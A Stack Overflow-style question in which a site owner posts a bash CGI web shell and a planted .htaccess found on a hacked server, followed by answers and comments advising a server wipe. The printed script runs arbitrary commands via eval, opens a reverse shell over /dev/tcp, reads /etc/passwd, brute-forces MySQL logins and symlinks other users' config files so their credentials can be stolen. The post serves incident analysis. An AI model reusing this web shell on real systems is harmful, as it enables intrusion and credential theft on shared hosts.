# Site got hacked and hacker left some shellscript, any ideas what he was doing? i can see he was brute forcing user / password attacks

Tags: php, bash, shell, security

this shell script was left behind:
called `r.sh`

I am not sure how he was able to upload the file, the website is very very old (from 2004). I basically took away the write access from apache to the directories so I thought at least nobody can upload files any longer. Each time I would upload a file via ftp for example I would login via SSH, do chown and chmod, upload the file, run chmod chown again to not have apache write access to the server. Now he somehow managed to upload a file anyway. Maybe: to the upload folder of the siteadmin. I have forbidden execution of php files in that folder
but maybe he used a different file format.
Maybe he figured somehow out the admin user password. Note: this site was hacked before, so he might even have the source code of the app.

**What does this script do?**

there was an added `.htaccess` file as well:

content:

```
Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .sh

AddHandler cgi-script .sh
AddHandler cgi-script .sh
```

`r.sh`:

```
#!/bin/bash -i

#
password="123456"


function cgi_get_POST_vars()
{
    # check content type
    [ "${CONTENT_TYPE}" != "application/x-www-form-urlencoded" ] && \
    echo "Warning: you should probably use MIME type "\
         "application/x-www-form-urlencoded!" 1>&2
    # save POST variables (only first time this is called)
    [ -z "$QUERY_STRING_POST" \
      -a "$REQUEST_METHOD" = "POST" -a ! -z "$CONTENT_LENGTH" ] && \
    read -n $CONTENT_LENGTH QUERY_STRING_POST
    return
}


function cgi_decodevar()
{
    [ $# -ne 1 ] && return
    local v t h

    t="${1//+/ }%%"
    while [ ${#t} -gt 0 -a "${t}" != "%" ]; do
    v="${v}${t%%\%*}" 
    t="${t#*%}"       

    if [ ${#t} -gt 0 -a "${t}" != "%" ]; then
        h=${t:0:2} 
        t="${t:2}" 
        v="${v}"`echo -e \\\\x${h}` 
    fi
    done

    echo "${v}"
    return
}


function cgi_getvars()
{
    [ $# -lt 2 ] && return
    local q p k v s
    # get query
    case $1 in
    GET)
        [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
        ;;
    POST)
        cgi_get_POST_vars
        [ ! -z "${QUERY_STRING_POST}" ] && q="${QUERY_STRING_POST}&"
        ;;
    BOTH)
        [ ! -z "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
        cgi_get_POST_vars
        [ ! -z "${QUERY_STRING_POST}" ] && q="${q}${QUERY_STRING_POST}&"
        ;;
    esac
    shift
    s=" $* "
    # parse the query data
    while [ ! -z "$q" ]; do
    p="${q%%&*}"  # get first part of query string
    k="${p%%=*}"  # get the key (variable name) from it
    v="${p#*=}"   # get the value from it
    q="${q#$p&*}" # strip first part from query string
    # decode and evaluate var if requested
    [ "$1" = "ALL" -o "${s/ $k /}" != "$s" ] && \
        eval "$k=\"`cgi_decodevar \"$v\"`\""
    done
    return
}

# register all GET and POST variables
cgi_getvars BOTH ALL

pass="SAVEDPWD=$password"
passv=`echo $HTTP_COOKIE | awk '$pass|'  -f0`

if [ $cc2 -eq 4 ] ; then
clear
echo -e "Set-Cookie: SAVEDPWD=;\nContent-type: text/html\n\n"
echo '<meta http-equiv="refresh" content="0;">'
exit
else

if [ -n "$xx"  ] ; then
echo -e "Set-Cookie: SAVEDPWD=$xx;\nContent-type: text/html\n\n"
echo '<meta http-equiv="refresh" content="0;">'
else
echo -e "Content-type: text/html\n\n"
fi

fi
echo 'PGh0bWw+PHRpdGxlPlJBQjNPVU4gU2hlbGw8L3RpdGxlPg0KPGhlYWQ+DQo8c3R5bGU+DQoNCmJvZHkNCnsNCgliYWNrZ3JvdW5kOiAjMzMzOw0KCWNvbG9yOiAjRjVGNUY1Ow0KDQoJcGFkZGluZzogMTBweDsNCg0KfQ0KDQoNCmE6bGluaywgYm9keV9hbGluaw0Kew0KCWNvbG9yOiAjRkY5OTMzOw0KCXRleHQtZGVjb3JhdGlvbjogbm9uZTsNCn0NCmE6dmlzaXRlZCwgYm9keV9hdmlzaXRlZA0Kew0KCWNvbG9yOiAjRkY5OTMzOw0KCXRleHQtZGVjb3JhdGlvbjogbm9uZTsNCn0NCmE6aG92ZXIsIGE6YWN0aXZlLCBib2R5X2Fob3Zlcg0Kew0KCWNvbG9yOiAjRkZGRkZGOw0KCXRleHQtZGVjb3JhdGlvbjogbm9uZTsNCn0NCg0KdGV4dGFyZWENCnsNCglib3JkZXI6IDFweCBzb2xpZDsNCgljdXJzb3I6IGRlZmF1bHQ7DQoJDQoJYmFja2dyb3VuZDogIzAwMDsNCgljb2xvcjogI2ZmZmZmZjsNCmJvcmRlcjoxcHggc29saWQgI2ExYTFhMTsNCnBhZGRpbmc6NXB4IDIwcHg7IA0KYm9yZGVyLXJhZGl1czoyNXB4Ow0KLW1vei1ib3JkZXItcmFkaXVzOjI1cHg7IC8qIEZpcmVmb3ggMy42IGFuZCBlYXJsaWVyICovDQoNCn0NCg0KaW5wdXQNCnsNCglib3JkZXI6IDFweCBzb2xpZDsNCgljdXJzb3I6IGRlZmF1bHQ7DQoJb3ZlcmZsb3c6IGhpZGRlbjsNCgliYWNrZ3JvdW5kOiAjMDAwOw0KCWNvbG9yOiAjZmZmZmZmOw0KYm9yZGVyOjFweCBzb2xpZCAjYTFhMWExOw0KcGFkZGluZzo1cHggMjBweDsgDQpib3JkZXItcmFkaXVzOjI1cHg7DQotbW96LWJvcmRlci1yYWRpdXM6MjVweDsgLyogRmlyZWZveCAzLjYgYW5kIGVhcmxpZXIgKi8NCg0KfQ0KaW5wdXQuYnV0dG9uIHsNCmZvbnQtZmFtaWx5OiBDb3VyaWVyIE5ldzsNCmNvbG9yOiAjZmZmZmZmOw0KZm9udC1zaXplOiAxNnB4Ow0KcGFkZGluZzogMTBweDsNCnRleHQtZGVjb3JhdGlvbjogbm9uZTsNCi13ZWJraXQtYm9yZGVyLXJhZGl1czogOHB4Ow0KLW1vei1ib3JkZXItcmFkaXVzOiA4cHg7DQotd2Via2l0LWJveC1zaGFkb3c6IDBweCAxcHggM3B4ICNhYmFiYWI7DQotbW96LWJveC1zaGFkb3c6IDBweCAxcHggM3B4ICNhYmFiYWI7DQp0ZXh0LXNoYWRvdzogMXB4IDFweCAzcHggIzY2NjY2NjsNCmJvcmRlcjogc29saWQgI2RlZGJkZSAxcHg7DQpiYWNrZ3JvdW5kOiAjOTA5MDkwIDsNCn0NCi5idXR0b246aG92ZXIgew0KYmFja2dyb3VuZDogI0IwQjBCMDsNCn0NCg0KIGRpdi5ib3gNCnsNCmNvbG9yOiAjMzMzOw0KYm9yZGVyOjNweCBzb2xpZCAjYTFhMWExOw0KcGFkZGluZzoxMHB4IDQwcHg7IA0KYmFja2dyb3VuZDojZThlOGU4Ow0Kd2lkdGg6OTQlOw0KYm9yZGVyLXJhZGl1czoyNXB4Ow0KLW1vei1ib3JkZXItcmFkaXVzOjI1cHg7IC8qIEZpcmVmb3ggMy42IGFuZCBlYXJsaWVyICovDQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KPGJvZHk+DQo8Y2VudGVyPg0KPHByZT4NCi5fX19fX18gICAgICAgICAgX19fICAgICAgLl9fX19fXyAgICBfX19fICAgICBfX19fX18gICAgX18gICAgX18gIC5fXyAgIF9fLiAgICAgICAgIF9fX19fX18uIF9fICAgIF9fICAgX19fX19fXyAgX18gICAgICAgX18gICAgICANCnwgICBfICBcICAgICAgICAvICAgXCAgICAgfCAgIF8gIFwgIHxfX18gXCAgIC8gIF9fICBcICB8ICB8ICB8ICB8IHwgIFwgfCAgfCAgICAgICAgLyAgICAgICB8fCAgfCAgfCAgfCB8ICAgX19fX3x8ICB8ICAgICB8ICB8ICAgICANCnwgIHxfKSAgfCAgICAgIC8gIF4gIFwgICAgfCAgfF8pICB8ICAgX18pIHwgfCAgfCAgfCAgfCB8ICB8ICB8ICB8IHwgICBcfCAgfCAgICAgICB8ICAgKC0tLS1gfCAgfF9ffCAgfCB8ICB8X18gICB8ICB8ICAgICB8ICB8ICAgICANCnwgICAgICAvICAgICAgLyAgL19cICBcICAgfCAgIF8gIDwgICB8X18gPCAgfCAgfCAgfCAgfCB8ICB8ICB8ICB8IHwgIC4gYCAgfCAgICAgICAgXCAgIFwgICAgfCAgIF9fICAgfCB8ICAgX198ICB8ICB8ICAgICB8ICB8ICAgICANCnwgIHxcICBcLS0tLS4vICBfX19fXyAgXCAgfCAgfF8pICB8ICBfX18pIHwgfCAgYC0tICAgfCB8ICBgLS0gICB8IHwgIHxcICAgfCAgICAuLS0tLSkgICB8ICAgfCAgfCAgfCAgfCB8ICB8X19fXyB8ICBgLS0tLS58ICBgLS0tLS4NCnwgX3wgYC5fX19fXy9fXy8gICAgIFxfX1wgfF9fX19fXy8gIHxfX19fLyAgIFxfX19fX18vICAgXF9fX19fXy8gIHxfX3wgXF9ffCAgICB8X19fX19fXy8gICAgfF9ffCAgfF9ffCB8X19fX19fX3x8X19fX19fX3x8X19fX19fX3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCg0KPC9wcmU+DQoNCjxkaXYgYWxpZ249ImNlbnRlciI+' | base64 -d

 function login()
{
echo 'RW50ZXIgcGFzc3dvcmQ8YnI+DQo8YnI+PGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+DQoJDQoJPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+DQoJPGRpdiBhbGlnbj0iY2VudGVyIj48dGFibGUgYm9yZGVyPSIwIiB3aWR0aD0iMTIwIiBpZD0idGFibGUxIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPjx0cj48dGQgPg0KPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJ4eCIgc2l6ZT0iMTAwIiB2YWx1ZT0iIi8+DQo8L3RkPjx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJidXR0b24xIiB2YWx1ZT0iU2VuZCIgLz48L3RkPjwvdHI+PC90YWJsZT48L2Rpdj48L2Zvcm0+PGJyPjxicj4NCjxicj48YnI+PGhyPg0KPGNlbnRlcj5Db2RlZCBieSBSYWIzb3VuPGJyPiBHcmVldHMgdG8gQWh3YWsyMDAwPC9jZW50ZXI+' | base64 -d

  return

    }




    echo "$HTTP_COOKIE" | grep -qi "$pass"
    if [ $? == 0 ]
    then
    echo ""
    else
login
exit
    fi


echo 'PHRhYmxlIGJvcmRlcj0wPjx0cj48dGQ+PGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+IA0KPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+IA0KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPgkJPGlucHV0IGNsYXNzPSJidXR0b24iIHR5cGU9InN1Ym1pdCIgbmFtZT0iYnV0dG9uIiB2YWx1ZT0iICAgSG9tZSAgICAiIC8+DQoJPC9mb3JtPg0KCTwvdGQ+PHRkPg0KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjYzIiIHZhbHVlPSIxIiAgLz4gCTxpbnB1dCBjbGFzcz0iYnV0dG9uIiB0eXBlPSJzdWJtaXQiIG5hbWU9ImJ1dHRvbiIgdmFsdWU9IiAgIFNob3cgVXNlciAgICAiIC8+DQoJPC9mb3JtPg0KPC90ZD4NCjx0ZD4NCjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCQ0KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImNjMiIgdmFsdWU9IjIiICAvPg0KCQk8aW5wdXQgY2xhc3M9ImJ1dHRvbiIgdHlwZT0ic3VibWl0IiBuYW1lPSJidXR0b24iIHZhbHVlPSIgU2hvdyAgIERvbWFpbnMgIiAvPg0KCTwvZm9ybT4NCjwvdGQ+DQo8dGQ+DQo8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgkNCgk8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjYzIiIHZhbHVlPSIzIiAgLz4NCgkNCgk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnV0dG9uIiBuYW1lPSJidXR0b24iIHZhbHVlPSJDcmVhdCAgLi4vc3ltbGluayIgLz4NCgk8L2Zvcm0+DQo8L3RkPg0KDQo8dGQ+DQo8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgkNCgk8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjYzIiIHZhbHVlPSI1IiAgLz4NCgkNCgk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnV0dG9uIiBuYW1lPSJidXR0b24iIHZhbHVlPSJDcGFuZWwiIC8+DQoJPC9mb3JtPg0KPC90ZD4NCg0KPHRkPg0KPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+DQoJDQoJPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249IiI+DQoJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iY2MyIiB2YWx1ZT0iNyIgIC8+DQoJDQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgbmFtZT0iYnV0dG9uIiB2YWx1ZT0iQkFDSy1DT05ORUNUIiAvPg0KCTwvZm9ybT4NCjwvdGQ+DQo8L3RyPjwvdGFibGU+DQogDQo8L2Rpdj4NCg0KPC9jZW50ZXI+' | base64 -d
if [ $cc2 -eq 7 ] ; then
echo '<br><form method="post" action="">

    <form method="post" action="">
    <div align="center">'
echo 'IP <input type="text" name="bip" size="50" value="';echo $REMOTE_ADDR;echo '"/><br>
Port <input type="text" name="bport" size="50" value="443"/></form><br><br>
<input type="hidden" name="cc2" value="8"  /><br>
<input type="submit" class="button" name="button" value="CONNECT" />'
echo "<br><br><hr><center>"
fi
if [ $cc2 -eq 8 ] ; then
bash -i >& /dev/tcp/$bip/$bport 0>&1
fi
if [ $cc2 -eq 6 ] ; then
echo '<pre>'



arr1=$(echo $listu | tr "\r" "\n")
arr2=$(echo $listp | tr "\r" "\n")
echo "<table border='0' width='100%'><tr><td align='center'><div class='box' align='left'><xmp>"
for x in $arr1
do
for y in $arr2
do
mysql -u$x -p$y  ;

if [ $? -eq 0 ] ; then
echo "Found Cpanel User $x Password ($y)"
fi

done
done
echo "</xmp></div></pre></td></tr></table>"
fi
if [ $cc2 -eq 5 ] ; then
echo '<form method="post" action="">
    <center> 
    <form method="post" action="">
Users
<br>
<textarea name="listu" cols="50" rows="15">'
eval `echo Y2F0IC9ldGMvcGFzc3dkIHxncmVwIC9ob21lIHxjdXQgLWQiOiIgLWYxIA== | base64 -d`;echo '</textarea>
<br>
Password
<br>
<textarea name="listp" cols="50" rows="15">123
1234
12345
123456
1234567
123456789
1234567890
123123
123321</textarea>

    <input type="hidden" name="cc2" value="6"  />
    <br>
    <br>
    <input type="submit" class="button" name="button" value="Send" />
    </form>
    <center>
'

fi





if [ $cc2 -eq 1 ] ; then
echo '<div align="center">'
echo "<xmp>"
eval `echo Y2F0IC9ldGMvcGFzc3dkIHxncmVwIC9ob21lIHxjdXQgLWQiOiIgLWYxIA== | base64 -d`
echo "</xmp>"
echo "</div>"
fi

if [ $cc2 -eq 2 ] ; then
echo "<br><center><table border='1' width='45%' cellspacing='0' bordercolor='#a3a3a3' cellpadding='0' align='center'><tr><td bgcolor='#000000' align='center'>Domain</td><td align='center' bgcolor='#000000'>User</td></tr>"

for i in `cat /etc/named.conf | uniq |grep '^zone' |grep -v '"."' |grep -v '"0.0.127.in-addr.arpa"' |cut -d ' ' -f 2  |cut -d '"' -f 2| sort | uniq `; do echo "<td align='center'>$i</td><td align='center'>" ; ls -dl /etc/valiases/$i |cut -d ' ' -f 3 ; echo "</td></tr>"; done

echo "</table></center><br>"
fi

if [ $cc2 -eq 3 ] ; then
echo "<xmp>"
mkdir ../sym
 echo Options Indexes FollowSymLinks > ../sym/.htaccess 
 echo  DirectoryIndex ssssss.htm >> ../sym/.htaccess 
 echo  AddType txt .php >> ../sym/.htaccess 
 echo  AddHandler txt .php >> ../sym/.htaccess 
 echo   AddType txt .html >> ../sym/.htaccess 
 echo  AddHandler txt .html >> ../sym/.htaccess 
 echo  Options all >> ../sym/.htaccess 
 echo  Options >> ../sym/.htaccess 
 echo  Options >> ../sym/.htaccess 
 echo 'ReadmeName r.txt' >> ../sym/.htaccess
 echo 'Q29kZWQgYnkgUkFCM09VTiA7KQ=='| base64 -d > ../sym/r.txt
for i in `cd /etc ;cat passwd |grep /home |cut -d":" -f1` ; do
eval "ln -s /home/$i/public_html/ ../sym/0-$i.txt" ;
eval "ln -s /home/$i/public_html/clientarea/configuration.php ../sym/$i-clientarea.txt";
eval "ln -s /home/$i/public_html/clients/configuration.php ../sym/$i-client.txt";
eval "ln -s /home/$i/public_html/configuration.php ../sym/$i-whmcsorjoomla.txt";
eval "ln -s /home/$i/public_html/billing/configuration.php ../sym/$i-billing.txt";
eval "ln -s /home/$i/public_html/billings/configuration.php ../sym/$i-billings.txt";
eval "ln -s /home/$i/public_html/whmcs/configuration.php ../sym/$i-whmcs2.txt";
eval "ln -s /home/$i/public_html/portal/configuration.php ../sym/$i-whmcs3.txt";
eval "ln -s /home/$i/public_html/my/configuration.php ../sym/$i-whmcs4.txt";
eval "ln -s /home/$i/public_html/whm/configuration.php ../sym/$i-whm.txt";
eval "ln -s /home/$i/public_html/whmc/configuration.php ../sym/$i-whmc.txt";
eval "ln -s /home/$i/public_html/support/configuration.php ../sym/$i-support.txt";
eval "ln -s /home/$i/public_html/supports/configuration.php ../sym/$i-supports.txt";
eval "ln -s /home/$i/public_html/vb/includes/config.php ../sym/$i-vb.txt";
eval "ln -s /home/$i/public_html/includes/config.php ../sym/$i-vb2.txt";
eval "ln -s /home/$i/public_html/config.php ../sym/$i-2.txt";
eval "ln -s /home/$i/public_html/forum/includes/config.php ../sym/$i-forum.txt";
eval "ln -s /home/$i/public_html/forums/includes/config.php ../sym/$i-forums.txt";
eval "ln -s /home/$i/public_html/admin/conf.php ../sym/$i-5.txt";
eval "ln -s /home/$i/public_html/admin/config.php ../sym/$i-4.txt";
eval "ln -s /home/$i/public_html/wp-config.php ../sym/$i-wordpress.txt";
eval "ln -s /home/$i/public_html/blog/wp-config.php ../sym/$i-wordpress2.txt";
eval "ln -s /home/$i/public_html/conf_global.php ../sym/$i-6.txt";
eval "ln -s /home/$i/public_html/include/db.php ../sym/$i-7.txt";
eval "ln -s /home/$i/public_html/connect.php ../sym/$i-8.txt";
eval "ln -s /home/$i/public_html/mk_conf.php ../sym/$i-9.txt";
eval "ln -s /home/$i/public_html/joomla/configuration.php ../sym/$i-joomla.txt";
eval "ln -s /home/$i/public_html/web/configuration.php ../sym/$i-joomla2.txt";
eval "ln -s /home/$i/public_html/portal/configuration.php ../sym/$i-joomla2.txt";
eval "ln -s /home/$i/public_html/include/config.php ../sym/$i-10.txt";
done
echo 'PC94bXA+PGRpdiBhbGlnbj0nY2VudGVyJz48YnI+IFN5bUxpbmtzIDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPScuLi9zeW0nPkNsaWNrIGhlcmU8L2E+IDwvZGl2Pg==' | base64 -d
fi
if [ -n "$cc"  ] ; then
echo "<table border='0' width='100%'><tr><td align='center'><div class='box' align='left'><xmp>"
cd $d 
eval $cc
echo $?
echo '</xmp></div></pre></td></tr></table><br><br>'
fi
echo 'PGJyPjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCQ0KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCTxkaXYgYWxpZ249ImNlbnRlciI+PHRhYmxlIGJvcmRlcj0iMCIgd2lkdGg9IjEyMCIgaWQ9InRhYmxlMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIj48dHI+PHRkIHdpZHRoPSI3MTIiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjYyIgc2l6ZT0iMTAwIiAgLz48L3RkPjx0ZD48L3RkPjwvdHI+PHRyPjx0ZCB3aWR0aD0iNzEyIj4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkIiBzaXplPSIxMDAiIHZhbHVlPSI=' | base64 -d
pwd  
echo 'Ii8+DQo8L3RkPjx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJidXR0b24xIiB2YWx1ZT0iU2VuZCIgLz48L3RkPjwvdHI+PC90YWJsZT48L2Rpdj48L2Zvcm0+PGJyPjxicj4NCjxicj48YnI+PGhyPjxjZW50ZXI+DQo8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgkNCgk8Zm9ybSBtZXRob2Q9InBvc3QiIGFjdGlvbj0iIj4NCgk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjYzIiIHZhbHVlPSI0IiAgLz4NCgkNCgk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnV0dG9uIiBuYW1lPSJidXR0b24iIHZhbHVlPSJMb2dvdXQiIC8+DQoJPC9mb3JtPg0KPGNlbnRlcj5Db2RlZCBieSBSYWIzb3VuPGJyPiBHcmVldHMgdG8gQWh3YWsyMDAwPC9jZW50ZXI+' | base64 -d
```

Comment: Might not be related but I dealt with a similar situation for a client of mine, the hacker changes the index of WordPress site. I found out the hacker used an old FTP account.

Comment: Well you've just shared the code and allowed others to use it!!!

Comment: @RamanSailopal yes raman, and I will add a bounty to it as well if I get no help. There must have been an underlying security flaw in the site. The file itself is useless if the hacker cannot place it on the server and run it. If the hacker can place files on the server and run them, you are in trouble whatsoever.

Answer (score 4):

`r.sh` is presumably shorthand for `rab3oun.sh`.  If you run the `base64 -d` commands, you'll see the "obfuscated" content, e.g. the last such obfuscation, which reads `echo 'Q29kZWQgYnkgUkFCM09VTiA7KQ=='| base64 -d` becomes `Coded by RAB3OUN ;)`  If you search for that text on the web, you'll find that person's email address (though I don't recommend using it, nor do I recommend blaming that developer for actually dropping that code there; it's more likely somebody just using Rab3oun's code).

I can't find references to rab3oun.sh or r.sh + rab3oun on the web right now; all of the hits I see are forum accounts or Rab3oun's "Whmcs Killer" software.

At one point in this script, it looks for CPanel (which, if found, could result in a much larger compromise of your server).  There's also a list of passwords to try logging into something.  This isn't really the right site to ask questions like this.

Feel free to further diagnose this code, but **I recommend wiping your server and reinstalling all of its software**.  Pay special attention to any file you retain through that reinstallation that is dated after your assumption of the time of the oldest known breach (and be aware of the fact that it might not actually be the first breach).  Keep everything patched and up to date and lock down whatever you can (disable services you're not using, disable insecure authentication mechanisms like [DSA](https://stackoverflow.com/questions/2821736/whats-the-difference-between-id-rsa-pub-and-id-dsa-pub/27855045#27855045), add a firewall that can block excessive login failures like [fail2ban](http://www.fail2ban.org/), etc.

Comment: which is the right site to ask? the question was "what does this script do" not "give me general advice". Don't get me wrong, by all means, give me general advice! but the question was asked in a way, that should conform to the stackoverflow question / answer style. "What does this piece of code do" especially the Cpanel  bit really made me curious if I can figure out if he managed to get those that would be very important because the client won't wipe his server.

Comment: I'm not sure.  There's a [code review SE](https://codereview.stackexchange.com/) site that might be a better fit, but you're not actually looking to improve the code.  From a security perspective, it might better fit on [security SE](https://security.stackexchange.com/), though that's not so much about the code.  I'm actually capable of helping either here or on security.SE (I'm expert in /bin/sh and in security and UNIX), but it won't be easy and I don't have much time this month.